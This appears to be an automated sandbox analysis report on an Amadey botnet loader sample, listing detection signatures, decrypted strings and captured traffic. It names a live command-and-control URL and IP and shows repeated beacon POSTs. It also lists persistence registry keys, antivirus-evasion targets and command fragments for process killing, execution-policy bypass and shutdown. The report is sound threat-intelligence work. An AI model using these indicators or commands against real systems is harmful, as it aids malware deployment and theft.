Windows Analysis Report
jcgLYlM4dg.exe

Overview

General Information

Sample name:	jcgLYlM4dg.exe renamed because original name is a hash value
Original sample name:	926fc8b724cc682d97cf0849c0fcbda3.exe
Analysis ID:	1428440
MD5:	926fc8b724cc682d97cf0849c0fcbda3
SHA1:	2f1555afddb43a13be489200a751698302340056
SHA256:	bcd9d9e586c6d788717507307e47d2e7c85eeaa49e7766434dbeca97973f8e59
Tags:	32Amadeyexetrojan
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected Powershell decode and execute

.NET source code contains a sample name check

.NET source code references suspicious native API functions

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Gzip Archive Decode Via PowerShell

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\startup_str_958.vbs

Avira: detection malicious, Label: VBS/Runner.VPXO

Found malware configuration

Source: 14.2.powershell.exe.a081288.4.unpack

Malware Configuration Extractor: Amadey {"C2 url": "ruspyc.top/j4Fvskd3/index.php", "Version": "4.18"}

Multi AV Scanner detection for submitted file

Source: jcgLYlM4dg.exe

ReversingLabs: Detection: 26%

Sample uses string decryption to hide its real strings

Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ruspyc.top
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: /j4Fvskd3/index.php
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: S-%lu-
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: 5027aaabaf
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Dctooux.exe
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Startup
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: rundll32
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Programs
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: %USERPROFILE%
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: http://
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: https://
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: /Plugins/
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: &unit=
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: shell32.dll
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: kernel32.dll
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: GetNativeSystemInfo
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ProgramData\
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: AVAST Software
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Kaspersky Lab
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Panda Security
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Doctor Web
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: 360TotalSecurity
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Bitdefender
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Norton
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Sophos
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Comodo
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: WinDefender
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: 0123456789
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ------
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ?scr=1
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ComputerName
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: -unicode-
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: VideoID
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: DefaultSettings.XResolution
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: DefaultSettings.YResolution
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ProductName
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: CurrentBuild
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: rundll32.exe
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: "taskkill /f /im "
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: " && timeout 1 && del
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: && Exit"
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: " && ren
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Powershell.exe
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: shutdown -s -t 0
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: random

Uses 32bit PE files

Source: jcgLYlM4dg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: jcgLYlM4dg.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: jcgLYlM4dg.exe

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00A2BA94
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00A3D420
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A4C508 FindFirstFileExA,	0_2_00A4C508

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49705 -> 85.114.96.4:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: ruspyc.top/j4Fvskd3/index.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
